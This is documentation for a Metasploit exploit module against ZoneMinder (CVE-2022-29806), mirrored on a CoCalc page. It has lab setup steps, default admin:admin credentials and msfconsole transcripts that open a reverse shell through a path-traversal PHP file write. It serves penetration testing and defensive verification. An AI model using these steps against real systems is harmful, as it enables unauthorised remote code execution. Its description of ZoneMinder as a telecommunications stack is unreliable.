CoCalc -- zoneminder_lang

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/unix/webapp/zoneminder_lang_exec.md
Views: ¹¹⁷⁸⁸

Description

This module exploits an arbitrary file write chained with a path traversal in the debug log file option in language settings that leads to a remote code execution in ZoneMinder surveillance software versions before 1.36.13 and before 1.37.11

More about the vulnerability detail: CVE-2022-29806.

The module will automatically use php/reverse_perl payload.

The module will check if authentication is enabled but Zoneminder does not enable the authentication by default.

Vulnerable Application

Zoneminder is a free and open-source software defined telecommunications stack for real-time communication, WebRTC, telecommunications, video, and Voice over Internet Protocol.

This module has been tested successfully on Zoneminder versions:

1.36.4~64bit on Ubuntu 18.04
1.34.23~64bit on Debian 11.10

Source and Installers

Docker installation

docker run -d --rm -ti -p 1080:80 \
    -e TZ='Europe/London' \
    --shm-size="512m" \
    --name zoneminder \
    zoneminderhq/zoneminder:latest-ubuntu18.04

Navigate to http://172.17.0.2/zm/index.php?view=privacy and click APPLY to activate the dashboard

Enable authentication

To enable authentication for verification and scenarios, follow these steps:

Navigate to http://172.17.0.2/zm/index.php?view=options
Tick the OPT_USE_AUTH option and click save
Login with the default password admin:admin
Navigate to http://172.17.0.2/zm/index.php?view=options&tab=users and change the admin password

Verification Steps

Do: use exploit/unix/webapp/zoneminder_lang_exec
Do: set RHOSTS [ips]
Do: set LHOST [lhost]
Do: run
You should get a shell.

Options

USERNAME

The ZoneMinder username (default: admin)

PASSWORD

The ZoneMinder password (default: admin)

Scenarios

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/rmdQiqoLFCsov.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:58932) at 2022-04-27 03:36:31 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker with authentication enabled

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set PASSWORD password
PASSWORD => password
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[+] Version Detected: 1.36.4
[*] Leak installation directory path
[+] Path: /usr/share/zoneminder/www
[+] Shell: ../../../../../tmp/Cn3PqXcN9VlAR98.php
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:51944) at 2022-04-27 18:53:14 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Failed exploitation due to invalid credentials

msf6 > use exploit/unix/webapp/zoneminder_lang_exec
[*] Using configured payload php/reverse_perl
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(unix/webapp/zoneminder_lang_exec) > set VERBOSE true
VERBOSE => true
msf6 exploit(unix/webapp/zoneminder_lang_exec) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[-] Service found, but authentication failed
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Exploit completed, but no session was created.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Description

Vulnerable Application

Source and Installers

Docker installation

Enable authentication

Verification Steps

Options

USERNAME

PASSWORD

Scenarios

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker with authentication enabled

Failed exploitation due to invalid credentials

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Description

Vulnerable Application

Source and Installers

Docker installation

Enable authentication

Verification Steps

Options

USERNAME

PASSWORD

Scenarios

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker

Successful exploitation of ZoneMinder 1.36.4 on Ubuntu 18.04 Docker with authentication enabled

Failed exploitation due to invalid credentials

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.